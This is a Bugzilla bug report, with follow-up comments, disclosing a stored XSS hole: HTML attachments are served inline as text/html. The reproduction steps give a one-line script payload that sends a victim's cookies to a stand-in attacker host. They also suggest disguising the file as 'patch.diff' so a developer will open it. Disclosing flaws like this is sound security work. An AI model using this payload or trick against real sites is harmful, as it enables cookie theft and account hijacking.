Jeff Turner Reporter
	Description • 18 years ago

User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060326 Firefox/1.5.0.3 (Debian-1.5.dfsg+1.5.0.3-2)
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060326 Firefox/1.5.0.3 (Debian-1.5.dfsg+1.5.0.3-2)

HTML attachments are served with the text/html MIME type to users. Any Javascript the attachment contains will be executed. This leaves Bugzilla open to XSS attacks, if a logged-in user can be convinced to click on one's attachment.

Reproducible: Always

Steps to Reproduce:
1. Create a HTML file with evil XSS stuff, eg. <script>document.write("<img src='http://hacksRus.example.com/xss?"+document.cookies+"'>")</script>.
2. Name file 'patch.diff', and attach to a bug with MIME type text/html
3. Ask a developer to review patch.diff, or simply wait until someone clicks on it.
4. Watch the victim's Bugzilla cookies appear in your logs.




For comparison, Mantis also serves HTML as text/html, but uses 'Content-Disposition: attachment' instead of 'Content-Disposition: inline'. The effect of this is that users are prompted as to how they wish to handle the attachment. This can be annoying, however, as patches can no longer be viewed in the browser.

Also of relevance: serving content as text/plain or application/octet-stream is not a sufficient defense against this in IE:

http://httpd.apache.org/docs/1.3/misc/FAQ.html#ie-ignores-mime

	Dave Miller [:justdave]
	Comment 1 • 18 years ago

*** This bug has been marked as a duplicate of 38862 ***

	Daniel Veditz [:dveditz]
	Comment 2 • 18 years ago

Note that bugzilla cookies are not all that interesting (they're tied to IP address), but that's not the only attack of course.

	Max Kanat-Alexander
	Comment 3 • 16 years ago

This bug is being removed from the security group because the bug that it is a duplicate of is now public, since it has been fixed and a Security Advisory has been sent about it. See bug 468249 for the Security Advisory.